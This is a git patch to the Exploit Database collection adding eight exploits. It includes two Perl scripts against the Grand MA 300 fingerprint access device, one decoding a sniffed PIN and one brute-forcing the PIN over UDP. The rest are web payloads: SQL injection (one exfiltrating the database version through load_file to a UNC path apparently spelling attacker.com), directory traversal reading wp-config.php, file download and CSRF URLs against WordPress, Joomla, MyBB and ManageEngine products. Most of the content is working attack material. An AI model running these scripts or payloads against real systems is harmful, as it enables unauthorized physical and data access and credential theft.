From 65e7008d6be4fe70e350253b90d3c84edf9d75a5 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 23 Jan 2016 05:02:05 +0000
Subject: [PATCH] DB: 2016-01-23

8 new exploits
---
 files.csv                            |   8 ++
 platforms/multiple/remote/39292.pl   |  54 ++++++++++
 platforms/multiple/remote/39293.pl   | 149 +++++++++++++++++++++++++++
 platforms/multiple/webapps/39288.txt |  13 +++
 platforms/php/webapps/39287.txt      |   9 ++
 platforms/php/webapps/39289.txt      |   9 ++
 platforms/php/webapps/39290.txt      |  10 ++
 platforms/php/webapps/39291.txt      |   7 ++
 platforms/php/webapps/39294.txt      |   9 ++
 9 files changed, 268 insertions(+)
 create mode 100755 platforms/multiple/remote/39292.pl
 create mode 100755 platforms/multiple/remote/39293.pl
 create mode 100755 platforms/multiple/webapps/39288.txt
 create mode 100755 platforms/php/webapps/39287.txt
 create mode 100755 platforms/php/webapps/39289.txt
 create mode 100755 platforms/php/webapps/39290.txt
 create mode 100755 platforms/php/webapps/39291.txt
 create mode 100755 platforms/php/webapps/39294.txt

diff --git a/files.csv b/files.csv
index 77e430692..ee6da66c8 100755
--- a/files.csv
+++ b/files.csv
@@ -35527,3 +35527,11 @@ id,file,description,date,author,platform,type,port
 39283,platforms/php/webapps/39283.txt,"WordPress FB Gorilla Plugin 'game_play.php' SQL Injection Vulnerability",2014-07-28,Amirh03in,php,webapps,0
 39284,platforms/windows/local/39284.txt,"Oracle HtmlConverter.exe - Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
 39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0
+39287,platforms/php/webapps/39287.txt,"WordPress WP Content Source Control Plugin 'download.php' Directory Traversal Vulnerability",2014-08-19,"Henri Salo",php,webapps,0
+39288,platforms/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 SQL Injection Vulnerability",2014-08-20,"Pedro Ribeiro",multiple,webapps,0
+39289,platforms/php/webapps/39289.txt,"ArticleFR 'id' Parameter SQL Injection Vulnerability",2014-08-20,"High-Tech Bridge",php,webapps,0
+39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module Cross Site Request Forgery Vulnerability",2014-08-22,Vagineer,php,webapps,0
+39291,platforms/php/webapps/39291.txt,"WordPress KenBurner Slider Plugin 'admin-ajax.php' Arbitrary File Download Vulnerabilitiy",2014-08-24,MF0x,php,webapps,0
+39292,platforms/multiple/remote/39292.pl,"Granding MA300 Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0
+39293,platforms/multiple/remote/39293.pl,"Granding MA300 Weak Pin Encryption Brute-force Weakness",2014-08-26,"Eric Sesterhenn",multiple,remote,0
+39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension 'theme' Parameter SQL Injection Vulnerability",2014-08-26,"Claudio Viviani",php,webapps,0
diff --git a/platforms/multiple/remote/39292.pl b/platforms/multiple/remote/39292.pl
new file mode 100755
index 000000000..d7f2fe00b
--- /dev/null
+++ b/platforms/multiple/remote/39292.pl
@@ -0,0 +1,54 @@
+source: http://www.securityfocus.com/bid/69390/info
+
+Grand MA 300 is prone to multiple security weaknesses.
+
+Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.
+
+Grand MA 300 running firmware version 6.60 is vulnerable. 
+
+#!/usr/bin/perl
+#
+# This script calculates the original pin based on the pin
+# retrieved on the wire for the Grand MA 300 fingerprint access device
+#
+# look for a UDP packet starting with 0x4E 0x04, the last 4 bytes are the
+# encoded pin
+#
+# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
+# http://www.lsexperts.de
+#
+use warnings;
+use strict;
+
+my $cid = 0;     # connection id
+my $ret = 0x4B00A987; # pin on the wire
+
+# get gettickcount value (third byte)
+my $gc = ($ret >> 16) & 0xFF;
+
+# set third byte to magic value (so it becomes zero when we xor it later with the magic value)
+$ret =  $ret | 0x005A0000;
+
+# xor all, but third byte with last byte of gettickcount
+$ret ^= $gc + ($gc << 8) + ($gc << 24);
+
+# switch the words
+$ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);
+
+# xor with magic value
+$ret ^= 0x4F534B5A;
+
+# substract the connection id
+$ret -= $cid;
+
+my $fin = 0;
+# revert the bits
+for (my $i = 0; $i < 32; $i++) {
+  $fin *= 2;
+  if ($ret & 1) {
+    $fin = $fin + 1;
+  }
+  $ret = $ret / 2;
+}
+
+printf("final: %X \n", $fin);
\ No newline at end of file
diff --git a/platforms/multiple/remote/39293.pl b/platforms/multiple/remote/39293.pl
new file mode 100755
index 000000000..757acae6e
--- /dev/null
+++ b/platforms/multiple/remote/39293.pl
@@ -0,0 +1,149 @@
+source: http://www.securityfocus.com/bid/69390/info
+ 
+Grand MA 300 is prone to multiple security weaknesses.
+ 
+Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.
+ 
+Grand MA 300 running firmware version 6.60 is vulnerable. 
+
+#!/usr/bin/perl
+#
+# This brute-forces the pin of a Grand MA 300 Fingerprint
+# Access device in less than 5 minutes, if the pin
+# is between 1 and 4294967296.
+#
+# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
+# http://www.lsexperts.de
+#
+use IO::Socket::INET;
+use strict;
+use warnings;
+
+sub hexd {
+        my ($data) = @_;
+        my $ret = "";
+        for (my $i=0; $i<length($data); $i++) {
+                $ret .= sprintf "%X", ord(substr($data, $i, 1));
+        }
+        return $ret;
+}
+sub getword {
+        my ($data, $offset) = @_;
+        my $ret = 0;
+
+        $ret = ord(substr($data, $offset, 1));
+        $ret += 0x100 * ord(substr($data, $offset+1, 1));
+        return $ret;
+}
+
+sub makeword {
+        my ($value) = @_;
+
+        my $ret = chr(($value & 0xFF)) . chr((($value >> 8) & 0xFF));
+
+        return $ret;
+}
+
+sub calccrc {
+        my ($packet) = @_;
+        # we pad with zero for packets of uneven length
+        my $newpacket = substr($packet, 0, 2) . substr($packet, 4) . chr(0);
+        my $crc = 0;
+
+        # the crc is the sum of all words in the packet
+        for (my $i = 0; $i<length($packet) - 2; $i += 2) {
+                $crc += getword($newpacket, $i);
+        }
+
+        # if the result is to big, we add the high bits to the lower bits
+        while ($crc > 0xFFFF) {
+                $crc = ($crc & 0xFFFF) + ($crc >> 0x10);
+        }
+
+        # negate the checksum
+        $crc = ~$crc & 0xFFFF;
+        return $crc;
+}
+
+sub makepacket {
+        my ($type, $cid, $seqno, $data) = @_;
+        my $crc = calccrc(makeword($type).makeword(0).makeword($cid).makeword($seqno).$data);
+        return makeword($type).makeword($crc).makeword($cid).makeword($seqno).$data;
+}
+
+sub calcpass {
+        my ($pin, $cid) = @_;
+        my $ret = 0;
+
+        # revert the bits
+        for (my $i = 0; $i < 32; $i++) {
+          $ret *= 2;
+          if ($pin & 1) {
+            $ret = $ret + 1;
+          }
+          $pin = $pin / 2;
+        }
+
+        $ret += $cid;
+
+        # xor with magic value
+        $ret ^= 0x4F534B5A;
+
+        # switch the words
+        $ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);
+
+        # xor all, but third byte with last byte of gettickcount
+        my $gc = 0x00;
+        $ret ^= $gc + ($gc << 8) + ($gc << 24);
+
+        # set third byte to last byte of gettickcount
+        # this weakens the algorithm even further, since this byte
+        # is no longer relevant to the algorithm
+        $ret = ($ret & 0xFF000000) + ($gc << 16) + ($ret & 0xFFFF);
+        
+        return $ret;
+}
+
+# flush after every write
+local $| = 1;
+
+my ($socket,$client_socket);
+
+# creating object interface of IO::Socket::INET modules which internally creates
+# socket, binds and connects to the TCP server running on the specific port.
+
+my $data;
+$socket = new IO::Socket::INET (
+        PeerHost => '192.168.1.201',    # CHANGEME
+        PeerPort => '4370',
+        Proto => 'udp',
+) or die "ERROR in Socket Creation : $!\n";
+
+# initialize the connection
+$socket->send(makepacket(1000, 0, 0, ""));
+$socket->recv($data, 1024);
+
+my $typ = getword($data, 0);
+my $cid = getword($data, 4);
+if ($typ != 2005) {
+        printf("Client does not need a password");
+        exit(-1);
+}
+
+for (my $i = 0; $i < 65536; $i++) {
+        if (($i % 10) == 0) { printf "$i\n"; }
+        my $pass = calcpass($i, $cid);
+        $socket->send(makepacket(1102, $cid, $i + 1, pack("V", $pass)));
+
+        $socket->recv($data, 1024);
+        $typ = getword($data, 0);
+        if ($typ == 2000) {
+                printf("Found pin: %d\n", $i);
+                exit(0);
+        }
+}
+
+# disconnect
+$socket->send(makepacket(1001, $cid, 2, ""));
+
+$socket->close();
\ No newline at end of file
diff --git a/platforms/multiple/webapps/39288.txt b/platforms/multiple/webapps/39288.txt
new file mode 100755
index 000000000..9df39e20d
--- /dev/null
+++ b/platforms/multiple/webapps/39288.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/69303/info
+
+ManageEngine Password Manager Pro and ManageEngine IT360 are prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following products are affected:
+
+ManageEngine Password Manager Pro 5 through 7 build 7003
+ManageEngine IT360 8 through 10.1.1 build 10110 
+
+www.example.com/MetadataServlet.dat?sv=[SQLi]
+www.example.com/console/MetadataServlet.dat?sv=[SQLi] 
\ No newline at end of file
diff --git a/platforms/php/webapps/39287.txt b/platforms/php/webapps/39287.txt
new file mode 100755
index 000000000..fd082d3d0
--- /dev/null
+++ b/platforms/php/webapps/39287.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69278/info
+
+WP Content Source Control plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
+
+WP Content Source Control 3.0.0 is vulnerable; other versions may also be affected. 
+
+www.example.com/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php 
\ No newline at end of file
diff --git a/platforms/php/webapps/39289.txt b/platforms/php/webapps/39289.txt
new file mode 100755
index 000000000..8e07d4629
--- /dev/null
+++ b/platforms/php/webapps/39289.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69307/info
+
+ArticleFR is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ArticleFR 3.0.4 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202 
\ No newline at end of file
diff --git a/platforms/php/webapps/39290.txt b/platforms/php/webapps/39290.txt
new file mode 100755
index 000000000..aea9f5a08
--- /dev/null
+++ b/platforms/php/webapps/39290.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/69386/info
+
+MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.
+
+An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.
+
+Versions prior to MyAwards 2.4 are vulnerable. 
+
+https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
+https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 
\ No newline at end of file
diff --git a/platforms/php/webapps/39291.txt b/platforms/php/webapps/39291.txt
new file mode 100755
index 000000000..a08b50a3c
--- /dev/null
+++ b/platforms/php/webapps/39291.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/69387/info
+
+The KenBurner Slider plugin for WordPress is prone to an arbitrary file-download vulnerability.
+
+An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. 
+
+http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php 
\ No newline at end of file
diff --git a/platforms/php/webapps/39294.txt b/platforms/php/webapps/39294.txt
new file mode 100755
index 000000000..2bcc64f74
--- /dev/null
+++ b/platforms/php/webapps/39294.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69422/info
+
+Spider Video Player extension for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+An attacker may leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Spider Video Player Extension 2.8.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1' 
\ No newline at end of file